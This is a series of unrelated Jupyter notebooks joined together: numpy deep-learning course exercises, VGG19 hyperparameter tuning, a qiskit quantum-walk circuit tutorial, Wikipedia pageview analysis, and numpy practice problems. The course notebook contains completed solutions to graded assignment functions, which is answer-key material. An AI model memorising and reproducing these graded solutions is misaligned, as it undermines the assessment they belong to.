softmax\text{(first row of x)} \\ softmax\text{(second row of x)} \\ ... \\ softmax\text{(last row of x)} \\\end{pmatrix} $$
###Code
# GRADED FUNCTION: softmax
def softmax(x):
"""Calculates the softmax for each row of the input x.
Your code should work for a row vector and also for matrices of shape (n, m).
Argument:
x -- A numpy matrix of shape (n,m)
Returns:
s -- A numpy matrix equal to the softmax of x, of shape (n,m)
"""
### START CODE HERE ### (≈ 3 lines of code)
# Apply exp() element-wise to x. Use np.exp(...).
x_exp = np.exp(x)
# Create a vector x_sum that sums each row of x_exp. Use np.sum(..., axis = 1, keepdims = True).
x_sum = np.sum(x_exp, axis = 1, keepdims = True)
# Compute softmax(x) by dividing x_exp by x_sum. It should automatically use numpy broadcasting.
s = x_exp/x_sum
### END CODE HERE ###
return s
x = np.array([
[9, 2, 5, 0, 0],
[7, 5, 0, 0 ,0]])
print("softmax(x) = " + str(softmax(x)))
###Output
softmax(x) = [[9.80897665e-01 8.94462891e-04 1.79657674e-02 1.21052389e-04
1.21052389e-04]
[8.78679856e-01 1.18916387e-01 8.01252314e-04 8.01252314e-04
8.01252314e-04]]
###Markdown
**Expected Output**: **softmax(x)** [[ 9.80897665e-01 8.94462891e-04 1.79657674e-02 1.21052389e-04 1.21052389e-04] [ 8.78679856e-01 1.18916387e-01 8.01252314e-04 8.01252314e-04 8.01252314e-04]] **Note**:- If you print the shapes of x_exp, x_sum and s above and rerun the assessment cell, you will see that x_sum is of shape (2,1) while x_exp and s are of shape (2,5). **x_exp/x_sum** works due to python broadcasting.Congratulations! You now have a pretty good understanding of python numpy and have implemented a few useful functions that you will be using in deep learning. **What you need to remember:**- np.exp(x) works for any np.array x and applies the exponential function to every coordinate- the sigmoid function and its gradient- image2vector is commonly used in deep learning- np.reshape is widely used. In the future, you'll see that keeping your matrix/vector dimensions straight will go toward eliminating a lot of bugs. - numpy has efficient built-in functions- broadcasting is extremely useful 2) Vectorization In deep learning, you deal with very large datasets. Hence, a non-computationally-optimal function can become a huge bottleneck in your algorithm and can result in a model that takes ages to run. To make sure that your code is computationally efficient, you will use vectorization. For example, try to tell the difference between the following implementations of the dot/outer/elementwise product.
###Code
import time
x1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]
x2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]
### CLASSIC DOT PRODUCT OF VECTORS IMPLEMENTATION ###
tic = time.process_time()
dot = 0
for i in range(len(x1)):
dot+= x1[i]*x2[i]
toc = time.process_time()
print ("dot = " + str(dot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### CLASSIC OUTER PRODUCT IMPLEMENTATION ###
tic = time.process_time()
outer = np.zeros((len(x1),len(x2))) # we create a len(x1)*len(x2) matrix with only zeros
for i in range(len(x1)):
for j in range(len(x2)):
outer[i,j] = x1[i]*x2[j]
toc = time.process_time()
print ("outer = " + str(outer) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### CLASSIC ELEMENTWISE IMPLEMENTATION ###
tic = time.process_time()
mul = np.zeros(len(x1))
for i in range(len(x1)):
mul[i] = x1[i]*x2[i]
toc = time.process_time()
print ("elementwise multiplication = " + str(mul) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### CLASSIC GENERAL DOT PRODUCT IMPLEMENTATION ###
W = np.random.rand(3,len(x1)) # Random 3*len(x1) numpy array
tic = time.process_time()
gdot = np.zeros(W.shape[0])
for i in range(W.shape[0]):
for j in range(len(x1)):
gdot[i] += W[i,j]*x1[j]
toc = time.process_time()
print ("gdot = " + str(gdot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
x1 = [9, 2, 5, 0, 0, 7, 5, 0, 0, 0, 9, 2, 5, 0, 0]
x2 = [9, 2, 2, 9, 0, 9, 2, 5, 0, 0, 9, 2, 5, 0, 0]
### VECTORIZED DOT PRODUCT OF VECTORS ###
tic = time.process_time()
dot = np.dot(x1,x2)
toc = time.process_time()
print ("dot = " + str(dot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### VECTORIZED OUTER PRODUCT ###
tic = time.process_time()
outer = np.outer(x1,x2)
toc = time.process_time()
print ("outer = " + str(outer) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### VECTORIZED ELEMENTWISE MULTIPLICATION ###
tic = time.process_time()
mul = np.multiply(x1,x2)
toc = time.process_time()
print ("elementwise multiplication = " + str(mul) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
### VECTORIZED GENERAL DOT PRODUCT ###
tic = time.process_time()
dot = np.dot(W,x1)
toc = time.process_time()
print ("gdot = " + str(dot) + "\n ----- Computation time = " + str(1000*(toc - tic)) + "ms")
###Output
dot = 278
----- Computation time = 0.0ms
outer = [[81 18 18 81 0 81 18 45 0 0 81 18 45 0 0]
[18 4 4 18 0 18 4 10 0 0 18 4 10 0 0]
[45 10 10 45 0 45 10 25 0 0 45 10 25 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[63 14 14 63 0 63 14 35 0 0 63 14 35 0 0]
[45 10 10 45 0 45 10 25 0 0 45 10 25 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[81 18 18 81 0 81 18 45 0 0 81 18 45 0 0]
[18 4 4 18 0 18 4 10 0 0 18 4 10 0 0]
[45 10 10 45 0 45 10 25 0 0 45 10 25 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0]]
----- Computation time = 0.0ms
elementwise multiplication = [81 4 10 0 0 63 10 0 0 0 81 4 25 0 0]
----- Computation time = 0.0ms
gdot = [15.96663552 28.92073296 25.01593558]
----- Computation time = 0.0ms
###Markdown
As you may have noticed, the vectorized implementation is much cleaner and more efficient. For bigger vectors/matrices, the differences in running time become even bigger. **Note** that `np.dot()` performs a matrix-matrix or matrix-vector multiplication. This is different from `np.multiply()` and the `*` operator (which is equivalent to `.*` in Matlab/Octave), which performs an element-wise multiplication. 2.1 Implement the L1 and L2 loss functions**Exercise**: Implement the numpy vectorized version of the L1 loss. You may find the function abs(x) (absolute value of x) useful.**Reminder**:- The loss is used to evaluate the performance of your model. The bigger your loss is, the more different your predictions ($ \hat{y} $) are from the true values ($y$). In deep learning, you use optimization algorithms like Gradient Descent to train your model and to minimize the cost.- L1 loss is defined as:$$\begin{align*} & L_1(\hat{y}, y) = \sum_{i=0}^m|y^{(i)} - \hat{y}^{(i)}| \end{align*}\tag{6}$$
###Code
# GRADED FUNCTION: L1
def L1(yhat, y):
"""
Arguments:
yhat -- vector of size m (predicted labels)
y -- vector of size m (true labels)
Returns:
loss -- the value of the L1 loss function defined above
"""
### START CODE HERE ### (≈ 1 line of code)
loss = np.sum(abs(y - yhat))
### END CODE HERE ###
return loss
yhat = np.array([.9, 0.2, 0.1, .4, .9])
y = np.array([1, 0, 0, 1, 1])
print("L1 = " + str(L1(yhat,y)))
###Output
L1 = 1.1
###Markdown
**Expected Output**: **L1** 1.1 **Exercise**: Implement the numpy vectorized version of the L2 loss. There are several way of implementing the L2 loss but you may find the function np.dot() useful. As a reminder, if $x = [x_1, x_2, ..., x_n]$, then `np.dot(x,x)` = $\sum_{j=0}^n x_j^{2}$. - L2 loss is defined as $$\begin{align*} & L_2(\hat{y},y) = \sum_{i=0}^m(y^{(i)} - \hat{y}^{(i)})^2 \end{align*}\tag{7}$$
###Code
# GRADED FUNCTION: L2
def L2(yhat, y):
"""
Arguments:
yhat -- vector of size m (predicted labels)
y -- vector of size m (true labels)
Returns:
loss -- the value of the L2 loss function defined above
"""
### START CODE HERE ### (≈ 1 line of code)
loss = np.sum(np.square(y-yhat))
### END CODE HERE ###
return loss
yhat = np.array([.9, 0.2, 0.1, .4, .9])
y = np.array([1, 0, 0, 1, 1])
print("L2 = " + str(L2(yhat,y)))
###Output
L2 = 0.43
|
code/VGG19Optimization_2.ipynb | ###Markdown
First we will read in the csv's so we can see some more information on the filenames and breeds
###Code
# df_train = pd.read_csv('../input/labels.csv')
# df_test = pd.read_csv('../input/sample_submission.csv')
# print('Training images: ',df_train.shape[0])
# print('Test images: ',df_test.shape[0])
# reduce dimensionality
#df_train = df_train.head(100)
#df_test = df_test.head(100)
#df_train.head(10)
###Output
_____no_output_____
###Markdown
We can see that the breed needs to be one-hot encoded for the final submission, so we will now do this.
###Code
# targets_series = pd.Series(df_train['breed'])
# one_hot = pd.get_dummies(targets_series, sparse = True)
# one_hot_labels = np.asarray(one_hot)
###Output
_____no_output_____
###Markdown
Next we will read in all of the images for test and train, using a for loop through the values of the csv files. I have also set an im_size variable which sets the size for the image to be re-sized to, 90x90 px, you should play with this number to see how it affects accuracy.
###Code
# im_size = 90
# x_train = []
# y_train = []
# x_test = []
# i = 0
# for f, breed in tqdm(df_train.values[:10]):
# img = cv2.imread('../input/train/{}.jpg'.format(f))
# label = one_hot_labels[i]
# x_train.append(cv2.resize(img, (im_size, im_size)))
# y_train.append(label)
# i += 1
# for f in tqdm(df_test['id'].values):
# img = cv2.imread('../input/test/{}.jpg'.format(f))
# x_test.append(cv2.resize(img, (im_size, im_size)))
# y_train_raw = np.array(y_train, np.uint8)
# x_train_raw = np.array(x_train, np.float32) / 255.
# x_test = np.array(x_test, np.float32) / 255.
###Output
_____no_output_____
###Markdown
We check the shape of the outputs to make sure everyting went as expected.
###Code
# print(x_train_raw.shape)
# print(y_train_raw.shape)
# print(x_test.shape)
###Output
_____no_output_____
###Markdown
We can see above that there are 120 different breeds. We can put this in a num_class variable below that can then be used when creating the CNN model.
###Code
# num_class = y_train_raw.shape[1]
# print('Number of classes: ', num_class)
###Output
_____no_output_____
###Markdown
It is important to create a validation set so that you can gauge the performance of your model on independent data, unseen to the model in training. We do this by splitting the current training set (x_train_raw) and the corresponding labels (y_train_raw) so that we set aside 30 % of the data at random and put these in validation sets (X_valid and Y_valid).* This split needs to be improved so that it contains images from every class, with 120 separate classes some can not be represented and so the validation score is not informative.
###Code
# X_train, X_valid, Y_train, Y_valid = train_test_split(x_train_raw, y_train_raw, test_size=validation_size, random_state=1)
###Output
_____no_output_____
###Markdown
Now we build the CNN architecture. Here we are using a pre-trained model VGG19 which has already been trained to identify many different dog breeds (as well as a lot of other objects from the imagenet dataset see here for more information: http://image-net.org/about-overview). Unfortunately it doesn't seem possible to downlod the weights from within this kernel so make sure you set the weights argument to 'imagenet' and not None, as it currently is below.We then remove the final layer and instead replace it with a single dense layer with the number of nodes corresponding to the number of breed classes we have (120).
###Code
def data():
print('Getting data')
df_train = pd.read_csv('../input/labels.csv')
df_test = pd.read_csv('../input/sample_submission.csv')
targets_series = pd.Series(df_train['breed'])
one_hot = pd.get_dummies(targets_series, sparse = True)
one_hot_labels = np.asarray(one_hot)
im_size = 90
x_train = []
y_train = []
x_test = []
i = 0
for f, breed in tqdm(df_train.values):
img = cv2.imread('../input/train/{}.jpg'.format(f))
label = one_hot_labels[i]
x_train.append(cv2.resize(img, (im_size, im_size)))
y_train.append(label)
i += 1
y_train_raw = np.array(y_train, np.uint8)
x_train_raw = np.array(x_train, np.float32) / 255.
num_class = y_train_raw.shape[1]
print('Splitting into training/validation')
X_train, X_valid, Y_train, Y_valid = train_test_split(x_train_raw, y_train_raw, test_size=0.3, random_state=1)
return X_train, Y_train, X_valid, Y_valid
# prepare data and model for hyperas
def model(X_train,Y_train,X_valid,Y_valid):
print('Creating model')
base_model = VGG19(weights = 'imagenet',
include_top=False,
input_shape=(im_size, im_size, 3))
dropout = {{uniform(0.5,1)}};
layers = {{choice([0,1,2])}};
dontFreeze = {{choice(list(range(5+1)))}};
batchSize = {{choice([16,64,256])}};
print()
print('dropout=',dropout)
print('layers=',layers)
print('dontFreeze=',dontFreeze)
print('batchSize=',batchSize)
print()
stepsPerEpoch = round( len(X_train)/batchSize );
# Add a new top layer
x = base_model.output
x = Flatten()(x)
x = Dropout(dropout)(x)
if layers>=2:
x = Dense(1024,activation='relu')(x)
if layers>=1:
x = Dense(512,activation='relu')(x)
# in any case:
predictions = Dense(num_class, activation='softmax')(x)
# This is the model we will train
model = Model(inputs=base_model.input, outputs=predictions)
# First: train only the top layers (which were randomly initialized)
for i in range(len(base_model.layers)-dontFreeze):
base_model.layers[i].trainable = False
# predetermined optimizer
lr=0.00020389590556056983;
beta_1=0.9453158868247398;
beta_2=0.9925872692991417;
decay=0.000821336141287018;
adam = keras.optimizers.Adam(lr=lr,beta_1=beta_1,beta_2=beta_2,decay=decay)
model.compile(loss='categorical_crossentropy',
optimizer=adam,
metrics=['accuracy'])
callbacks_list = [];
callbacks_list.append(keras.callbacks.EarlyStopping(
monitor='val_acc',
patience=10,
verbose=1));
# data augmentation & fitting
datagen = ImageDataGenerator(
rotation_range=30,
width_shift_range=0.1,
height_shift_range=0.1,
shear_range=0.5,
zoom_range=0.5,
horizontal_flip=True,
vertical_flip=True);
model.fit_generator(
datagen.flow(X_train,Y_train,batch_size=batchSize),
steps_per_epoch=stepsPerEpoch,
epochs=150,
verbose=1,
validation_data=(X_valid,Y_valid),
workers=2,
shuffle=True,
callbacks=callbacks_list)
# model.fit(X_train, Y_train,
# epochs=100,
# batch_size = batchSize,
# validation_data=(X_valid, Y_valid),
# verbose=1,
# callbacks=callbacks_list)
score, acc = model.evaluate(X_valid, Y_valid, verbose=0)
print('Test accuracy:', acc)
return {'loss': -acc, 'status': STATUS_OK, 'model': model}
best_run, best_model = optim.minimize(model=model,
data=data,
algo=tpe.suggest,
max_evals=10,
trials=Trials(),
notebook_name='VGG19Optimization_2')
X_train, Y_train, X_test, Y_test = data()
val_loss, val_acc = best_model.evaluate(X_test, Y_test);
print("Evalutation of best performing model:")
print("Validation loss: ", val_loss)
print("Validation accuracy: ", val_acc)
best_model.save(modelPath);
best_model.summary()
###Output
_____no_output_____
###Markdown
Remember, accuracy is low here because we are not taking advantage of the pre-trained weights as they cannot be downloaded in the kernel. This means we are training the wights from scratch and I we have only run 1 epoch due to the hardware constraints in the kernel.Next we will make our predictions.
###Code
# preds = model.predict(x_test, verbose=1)
# sub = pd.DataFrame(preds)
# # Set column names to those generated by the one-hot encoding earlier
# col_names = one_hot.columns.values
# sub.columns = col_names
# # Insert the column id from the sample_submission at the start of the data frame
# sub.insert(0, 'id', df_test['id'])
# sub.head(10)
###Output
_____no_output_____ |
tutorials/03-CircuitTranslation.ipynb | ###Markdown
Circuit TranslationIn this notebook we will introduce a tool of `sqwalk` that is useful to decompose (or translate) an unitary transormation (in our case the one generated by the walker's Hamiltonian) into a series of gates that can be simulated or even run on quantum hardware. The decomposition method is based on `qiskit` thus we will need it as a dependency, in addition to our usual `SQWalker` class and some QuTiP objects.Before jumping to the tutorial, it is useful to note here that this decomposition, for the sake of being general, it is not optimized. Indeed, while it supports any kind of quantum computer and every kind of quantum walker it usually takes up a lot of gates to implement the decomposition. To optimize the number of gate one must resort to some specific techniques in the literature that leverage the symmetries and characteristics of some particular graphs and are not general.
###Code
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import scipy
from sqwalk import SQWalker
from sqwalk import gate_decomposition
from qiskit import Aer
from qiskit.visualization import *
###Output
_____no_output_____
###Markdown
First we create the walker as we have seen in the previous notebooks and we run it for a certain time to have a reference result. In this case we have picked a time of 1000.
###Code
#Create and run the walker
graph = nx.path_graph(8)
adj = nx.adj_matrix(graph).todense()
walker = SQWalker(np.array(adj))
time_samples = 1000
initial_node = 0
result = walker.run_walker(initial_node, time_samples)
new_state = result.final_state
nodelist = [i for i in range(adj.shape[0])]
plt.bar(nodelist, new_state.diag())
plt.show()
###Output
_____no_output_____
###Markdown
Our decomposition, albeit being devised as a tool to decompose walkers, can be used with any Unitary or Hamiltonian.Note that since we will use a system of $n$ qubits, our Hamiltonian has to be $2^n$ dimensional, if the problem has the wrong dimensionality one can zero-pad it to make it work.The time we used above in `time_samples` has to be rescaled of a factor of $100$ since the timestep of the master equation in run_walker is $10^{-2}$.
###Code
#Estract the Hamiltonian from the walker
hamiltonian = walker.quantum_hamiltonian.full()
#Set the time one wants to simulate
time_rescaled = 10
#Compute the respective unitary
unitary = scipy.linalg.expm(-1j*time_rescaled*hamiltonian)
###Output
_____no_output_____
###Markdown
Now it is all set up to decompose our walker using the `gate_decomposition` function from `sqwalk`. To decompose it, it is suffiicent to pass our unitary to the function that, leveraging qiskit transpiling, will give us back the quantum circuit.The `gate_decomposition` function also accepts two more arguments:- topology: a list of connections between qubits specifying the topology of the particular hardware we want to decompose on, default topology is fully connected.- gates: a list of allowed gates that can be used to create the decomposition, defaults to single qubit rotations and CNOT.The resulting decomposition is a qiskit circuit object that can be exported into QASM instructions ot be executed on virtually every device.
###Code
#Decompose into gates
circuit_decomp = gate_decomposition(unitary)
circuit_decomp.qasm() # port it to whatever hardware
#circuit_decomp.draw()
###Output
_____no_output_____
###Markdown
As an example we take a simulator backend from `qiskit` itself (it could be a real device instead of a simulator), we execute the decomposed circuit and plot the result.
###Code
backend=Aer.get_backend('aer_simulator')
circuit_decomp.measure_all()
result=backend.run(circuit_decomp).result()
counts = result.get_counts(circuit_decomp)
plot_histogram(counts)
###Output
_____no_output_____
###Markdown
We can see that the decomposition is perfectly consistent with the quantum walker we have simulated above with SQWalk!
###Code
###Output
_____no_output_____ |
data-512-a1/data512-a1-data-curation.ipynb | ###Markdown
Data Curation This notebook walks through all the steps for the analysis from gathering the data, processing the data and finally performing analysis by creating a visualization. Step 1: Gathering the Data The pagecounts and pageviews data are collected from their respective APIs and stored in 5 different json files depending on the different access types. Importing required libraries...
###Code
import os
import shutil
import pandas as pd
import numpy as np
import functools
import datetime
import json
import requests
%matplotlib inline
import matplotlib.pyplot as plt
###Output
_____no_output_____
###Markdown
REST API endpoints:* [Legacy Pagecounts API](https://wikimedia.org/api/rest_v1//Legacy%20data)* [Pageviews API](https://wikimedia.org/api/rest_v1//Pageviews%20data)
###Code
endpoint_legacy = 'https://wikimedia.org/api/rest_v1/metrics/legacy/pagecounts/aggregate/{project}/{access-site}/{granularity}/{start}/{end}'
endpoint_pageviews = 'https://wikimedia.org/api/rest_v1/metrics/pageviews/aggregate/{project}/{access}/{agent}/{granularity}/{start}/{end}'
###Output
_____no_output_____
###Markdown
Creating directory structure for the data
###Code
json_output_folder = "data/json"
csv_output_folder = "data/csv"
if os.path.exists("data"):
shutil.rmtree("data")
os.mkdir("data")
os.mkdir(json_output_folder)
os.mkdir(csv_output_folder)
###Output
_____no_output_____
###Markdown
Creating the header for calling the APIs
###Code
headers = {
'User-Agent': 'https://github.com/chavi-g',
'From': '[email protected]'
}
###Output
_____no_output_____
###Markdown
Creating functions to create the parameters for the APIs.
###Code
def get_pagecount_params(access_site, start, end):
params = {
"project" : "en.wikipedia.org",
"access-site" : access_site,
"granularity" : "monthly",
"start" : start,
"end" : end
}
return params
def get_pageview_params(access, start, end):
params = {
"project" : "en.wikipedia.org",
"access" : access,
"agent" : "user",
"granularity" : "monthly",
"start" : start,
"end" : end
}
return params
###Output
_____no_output_____
###Markdown
Utility functions to call the rest APIs and store the data in files
###Code
def api_call(endpoint,parameters):
call = requests.get(endpoint.format(**parameters), headers=headers)
response = call.json()
return response
def get_json_file_path(apiname, accesstype, firstmonth, lastmonth):
filename = "{0}_{1}_{2}-{3}.json".format(apiname, accesstype, firstmonth, lastmonth)
return os.path.join(json_output_folder, filename)
def write_data_to_json(data, filename):
data_string = json.dumps(data, indent=2)
with open(filename, "w") as f:
f.write(data_string)
def get_pageviews_data(access, start, end):
pageview_data = api_call(endpoint_pageviews, get_pageview_params(access, start, end))
firstmonth = start[:6]
endmonth = end[:6]
filename = get_json_file_path('pageviews', access, firstmonth, endmonth)
write_data_to_json(pageview_data, filename)
return filename
def get_pagecounts_data(access_site, start, end):
pagecount_data = api_call(endpoint_legacy, get_pagecount_params(access_site, start, end))
firstmonth = start[:6]
endmonth = end[:6]
filename = get_json_file_path('pagecounts', access_site, firstmonth, endmonth)
write_data_to_json(pagecount_data, filename)
return filename
###Output
_____no_output_____
###Markdown
Creating json files for Pageviews API
###Code
start, end = "2015070100", "2020090100"
pageview_desktop_file = get_pageviews_data("desktop", start, end)
pageview_mobile_app_file = get_pageviews_data("mobile-app", start, end)
pageview_mobile_web_file = get_pageviews_data("mobile-web", start, end)
###Output
_____no_output_____
###Markdown
Creating json files for Legacy Pagecounts API
###Code
start, end = "2007120100", "2016070100"
pagecount_desktop_file = get_pagecounts_data("desktop-site", start, end)
pagecount_mobile_file = get_pagecounts_data("mobile-site", start, end)
###Output
_____no_output_____
###Markdown
Step 2: Processing the Data The pageview and pagecount data is processed to get counts for `mobile`, `desktop` and `all` access types. For doing this, the data for different access types are combined on the year and month values and added. For missing year data, the count is assumed to be 0 and thus not added.
###Code
def read_data_from_json(filename):
data = {}
with open(filename, "r") as f:
data = json.loads(f.read())
return data
pageview_desktop_data = read_data_from_json(pageview_desktop_file)
pageview_mobile_app_data = read_data_from_json(pageview_mobile_app_file)
pageview_mobile_web_data = read_data_from_json(pageview_mobile_web_file)
pagecount_desktop_data = read_data_from_json(pagecount_desktop_file)
pagecount_mobile_data = read_data_from_json(pagecount_mobile_file)
###Output
_____no_output_____
###Markdown
Preparing Pageview fields The following code aggregates the pageview counts to create the following output fields: `pageview_desktop_views`, `pageview_mobile_views`, `pageview_all_views`
###Code
pageview_desktop_views = pd.DataFrame(pageview_desktop_data['items'])
pageview_desktop_views['year'] = pageview_desktop_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pageview_desktop_views['month'] = pageview_desktop_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pageview_desktop_views = pageview_desktop_views[['year', 'month', 'views']]
pageview_desktop_views.head()
pageview_mobile_app_views = pd.DataFrame(pageview_mobile_app_data['items'])
pageview_mobile_app_views['year'] = pageview_mobile_app_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pageview_mobile_app_views['month'] = pageview_mobile_app_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pageview_mobile_app_views = pageview_mobile_app_views[['year', 'month', 'views']]
pageview_mobile_web_views = pd.DataFrame(pageview_mobile_web_data['items'])
pageview_mobile_web_views['year'] = pageview_mobile_web_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pageview_mobile_web_views['month'] = pageview_mobile_web_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pageview_mobile_web_views = pageview_mobile_web_views[['year', 'month', 'views']]
merged_pageview_mobile_views = pd.concat([pageview_mobile_app_views,pageview_mobile_web_views])
pageview_mobile_views = merged_pageview_mobile_views.groupby(['year', 'month']).agg({"views":['sum']}).reset_index()
pageview_mobile_views.columns = ['year', 'month', 'views']
pageview_mobile_views.head()
merged_pageview_all_views = pd.concat([pageview_desktop_views, pageview_mobile_views])
pageview_all_views = merged_pageview_all_views.groupby(['year', 'month']).agg({"views": ['sum']}).reset_index()
pageview_all_views.columns = ['year', 'month', 'views']
pageview_all_views.head()
###Output
_____no_output_____
###Markdown
Preparing Pagecount fields The following code aggregates the pagecounts to create the following output fields: `pagecount_desktop_views`, `pagecount_mobile_views`, `pagecount_all_views`
###Code
pagecount_desktop_views = pd.DataFrame(pagecount_desktop_data['items'])
pagecount_desktop_views['year'] = pagecount_desktop_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pagecount_desktop_views['month'] = pagecount_desktop_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pagecount_desktop_views = pagecount_desktop_views[['year', 'month', 'count']]
pagecount_desktop_views.head()
pagecount_mobile_views = pd.DataFrame(pagecount_mobile_data['items'])
pagecount_mobile_views['year'] = pagecount_mobile_views.apply(lambda row: row['timestamp'][:4], axis = 1)
pagecount_mobile_views['month'] = pagecount_mobile_views.apply(lambda row: row['timestamp'][4:6], axis = 1)
pagecount_mobile_views = pagecount_mobile_views[['year', 'month', 'count']]
pagecount_mobile_views.head()
merged_pagecount_all_views = pd.concat([pagecount_desktop_views, pagecount_mobile_views])
pagecount_all_views = merged_pagecount_all_views.groupby(['year', 'month']).agg({"count": ['sum']}).reset_index()
pagecount_all_views.columns = ['year', 'month', 'count']
pagecount_all_views.head()
###Output
_____no_output_____
###Markdown
Concatenating all the fields to create the final csv file output
###Code
pagecount_all_views = pagecount_all_views.rename(columns = {'count' : 'pagecount_all_views'})
pagecount_desktop_views = pagecount_desktop_views.rename(columns = {'count' : 'pagecount_desktop_views'})
pagecount_mobile_views = pagecount_mobile_views.rename(columns = {'count' : 'pagecount_mobile_views'})
pageview_all_views = pageview_all_views.rename(columns = {'views' : 'pageview_all_views'})
pageview_desktop_views = pageview_desktop_views.rename(columns = {'views' : 'pageview_desktop_views'})
pageview_mobile_views = pageview_mobile_views.rename(columns = {'views' : 'pageview_mobile_views'})
all_dfs = [pagecount_all_views, pagecount_desktop_views, pagecount_mobile_views, pageview_all_views, pageview_desktop_views,pageview_mobile_views]
merged_df = functools.reduce(lambda left, right: pd.merge(left, right, on=['year', 'month'], how = 'outer'), all_dfs)
merged_df.pagecount_all_views = merged_df.pagecount_all_views.astype('Int64')
merged_df.pagecount_desktop_views = merged_df.pagecount_desktop_views.astype('Int64')
merged_df.pagecount_mobile_views = merged_df.pagecount_mobile_views.astype('Int64')
merged_df.pageview_all_views = merged_df.pageview_all_views.astype('Int64')
merged_df.pageview_desktop_views = merged_df.pageview_desktop_views.astype('Int64')
merged_df.pageview_mobile_views = merged_df.pageview_mobile_views.astype('Int64')
merged_df.to_csv(os.path.join(csv_output_folder, "en-wikipedia_traffic_200712-202008.csv"), index=False)
###Output
_____no_output_____
###Markdown
Step 3: Analyzing the Data Creating plot for final analysis The final plot for analysis is created using the matplotlib library.
###Code
# Creating date field for plotting the x-axis
merged_df['date'] = merged_df.apply(lambda r: datetime.datetime(int(r.year), int(r.month), 1), axis=1)
merged_df = merged_df.sort_values('date')
plt.figure(figsize=(18, 8))
plt.plot(merged_df['date'], merged_df['pageview_desktop_views']/1000000,color='g')
plt.plot(merged_df['date'], merged_df['pageview_mobile_views']/1000000,color='b')
plt.plot(merged_df['date'], merged_df['pageview_all_views']/1000000,color='black')
plt.plot(merged_df['date'], merged_df['pagecount_desktop_views']/1000000,color='g',linestyle='--')
plt.plot(merged_df['date'], merged_df['pagecount_mobile_views']/1000000,color='b',linestyle='--')
plt.plot(merged_df['date'], merged_df['pagecount_all_views']/1000000,color='black',linestyle='--')
plt.legend(["PageView Desktop","PageView Mobile", "PageView All", "PageCount Desktop","PageCount Mobile","PageCount All"])
plt.title("Page Views on English Wikipedia (x1,000,00)")
plt.grid()
plt.savefig("final_visualization.png")
###Output
_____no_output_____ |
numpy/numpy_test.ipynb | ###Markdown
--------------------------------------------------------------- python best courses https://courses.tanpham.org/ --------------------------------------------------------------- 100 numpy exercisesThis is a collection of exercises that have been collected in the numpy mailing list, on stack overflow and in the numpy documentation. The goal of this collection is to offer a quick reference for both old and new users but also to provide a set of exercices for those who teach. 1. Import the numpy package under the name `np` (★☆☆)
###Code
import numpy as np
a=np.array([1,2,3])
b=np.array([4,5,6])
print(np.vstack((a,b)))
###Output
[[1 2 3]
[4 5 6]]
###Markdown
2. Print the numpy version and the configuration (★☆☆)
###Code
print(np.__version__)
np.show_config()
###Output
1.15.1
lapack_opt_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
blas_opt_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
lapack_mkl_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
blas_mkl_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
mkl_info:
libraries = ['mkl_rt', 'pthread']
library_dirs = ['/Users/yumei/anaconda3/lib']
define_macros = [('SCIPY_MKL_H', None), ('HAVE_CBLAS', None)]
include_dirs = ['/Users/yumei/anaconda3/include']
###Markdown
3. Create a null vector of size 10 (★☆☆)
###Code
Z = np.zeros(10)
print(Z)
###Output
[0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
###Markdown
4. How to find the memory size of any array (★☆☆)
###Code
Z = np.zeros((10,10))
print("%d bytes" % (Z.size * Z.itemsize))
###Output
800 bytes
###Markdown
5. How to get the documentation of the numpy add function from the command line? (★☆☆)
###Code
%run `python -c "import numpy; numpy.info(numpy.add)"`
###Output
ERROR:root:File `u'`python.py'` not found.
###Markdown
6. Create a null vector of size 10 but the fifth value which is 1 (★☆☆)
###Code
Z = np.zeros(10)
Z[4] = 1
print(Z)
###Output
[0. 0. 0. 0. 1. 0. 0. 0. 0. 0.]
###Markdown
7. Create a vector with values ranging from 10 to 49 (★☆☆)
###Code
Z = np.arange(10,50)
print(Z)
###Output
[10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49]
###Markdown
8. Reverse a vector (first element becomes last) (★☆☆)
###Code
Z = np.arange(50)
Z = Z[::-1]
print(Z)
###Output
